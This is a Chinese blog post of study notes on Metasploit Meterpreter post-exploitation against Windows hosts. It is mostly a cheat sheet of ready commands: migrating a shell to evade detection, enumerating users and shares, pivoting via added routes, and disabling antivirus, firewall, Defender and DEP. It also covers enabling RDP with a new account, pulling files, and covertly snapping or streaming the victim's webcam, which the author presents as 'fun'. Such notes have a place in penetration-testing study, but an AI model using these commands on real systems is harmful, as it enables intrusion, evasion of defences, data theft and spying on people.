msf之后渗透(笔记)

后渗透攻击:信息收集

Metasploit提供了一个强大的后渗透工具——Meterpreter后期渗透模块有200多个。

Meterpreter优势:

 - 纯内存工作模式,不需要对磁盘进行任何写入操作
 - 使用加密通信协议,可以同时与几个信道通信
 - 在被攻击进程内工作,不需要创建新的进程
 - 易于在多进程之间迁移
 - 平台通用

  • 进程迁移
    获得shell时,该shell是极其脆弱,所以需要移动这个shell把它和目标机中一个稳定的进程绑定在一起,而不需要对磁盘进行任何写入操作,这样使渗透更难被检测到
获取目标机正在运行的进程:ps

输入getpid命令查看shell的进程号(pid),然后根据进程号对应ps命令查出来的name

查看shell的进程号:getpid

输入migrate 448命令把shell移动到pid为448的exe进程里,因为该进程是一个稳定的应用,完成进程迁移后,再次输入getpid命令查看shell的进程号

把shell进程迁移到(pid=448)的进程里:migrate 448

完成后,原先shell的进程会自动关闭,如果没有自动关闭可以输入 kill 984杀死该进程

手动关闭(pid=984)进程:kill 984

自动迁移进程命令(run post/windows/manage/migrate)后,系统会自动寻找合适的进程然后迁移

自动寻找合适的进程迁移:run post/windows/manage/migrate
  • 系统命令
    获得稳定的进程后,接下来收集系统信息

查看目标机的系统信息						sysinfo
检查目标机是否正在运行(最近的运行时间) 	idletime
查看目标机完整的网络设置					route
将当前会话放到后台						background
查看当前目标机上已经渗透成功的用户名		getuid
关闭目标机系统杀毒软件					run post/windows/manage/killav
启动远程桌面协议(3389)					run post/windows/manage/enable_rdp
查看目标机的本地子网情况					run post/windows/manage/autoroute


可以借助被攻陷的主机对其他网络进行攻击:

添加路由									route add 192.168.43.0 255.255.255.0
查看路由情况								route print
列举当前那些用户登陆目标机				run post/windows/gather/enum_logged_on_users
列举安装在目标机上的应用程序				run post/windows/gather/enum_applications
获取目标机器的分区情况					run post/windows/gather/forensics/enum_drives
检查目标机是否运行在虚拟机上				run post/windows/gather/checkvm
开启服务									run post/windows/gather/enum_services
查看共享									run post/windwos/gather/enum_shares
获取主机最近的系统操作					run	post/windows/gather/dumplinks
查看补丁									run	post/windows/gather/enum_applications



几个好玩的命令:

对远程主机当前屏幕进行截图				screenshot
查看目标机有没有摄像头					webcam_list
打开目标机摄像头拍一张照片				webcam_snap
开启直播模式								webcam_stream
进入目标机的命令模式						shell

  • 文件系统命令
    Meterpreter支持各种文件系统命令,用于搜索文件并执行各种任务

pwd或getwd:查看当前处于目标机的哪个目录
getlwd:查看当前处于本地的哪个目录
ls:列出当前目录中的所有文件
cd:切换目录
search-f*.txt-d c: \:可以搜索C盘中所有以.txt为扩展名的文件,其中-f用于指定搜索文件模式,-d用于指定在哪个目录下进行搜索
download C: \test.txt/root:下载目标机C盘的test.txt文件到攻击机root下
upload/root/test.txt C:\:上传攻击机root目录下的test.txt文件到目标机C盘下

上述可以使我们获得更多关于目标机的信息,当然还包含很多文件系统命令,需要我们去了解。

后渗透攻击:权限提升

在渗透测试的过程中很有可能只获得了一个系统的Guest或者User权限,低的权限级别使我们受到了很多的限制,在实施横向渗透或者提权攻击时很困难,在主机上如果没有管理员权限,就无法进行获取Hash、安装软件、修改防火墙规则和修改注册表等各种操作,所以必须将访问权限从Guest提升到User再到admin最后到System级别,渗透的目的是获取服务器的最高权限,也就是Windows的管理员账号或linux的root权限。

  • 提升权限的方式
纵向提权:低权限A获得高权限B的权限也称为权限升级
横向提权:获取同级别的权限,通过系统A获取了系统B的权限

后渗透攻击:关闭杀软

关闭防火墙:
netsh advfirewall set allprofiles state off
关闭Denfender:
net stop windefend
关闭DEP:
bcdedit.exe/set{current}nx alwaysoff
关闭杀毒软件:
run killav
run post/windows/manage/killava

后渗透攻击:远程连接

开启远程桌面:
run post/windows/manage/enable_rdp
run getgui -e
开启远程桌面并添加一个新用户:
run getgui -u xxx -p ean
开启远程桌面并绑定在8888端口:
run getgui -e -f 8888
截图:
load espia
screengrab

小知识

whoami/groups:查看当前的权限
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值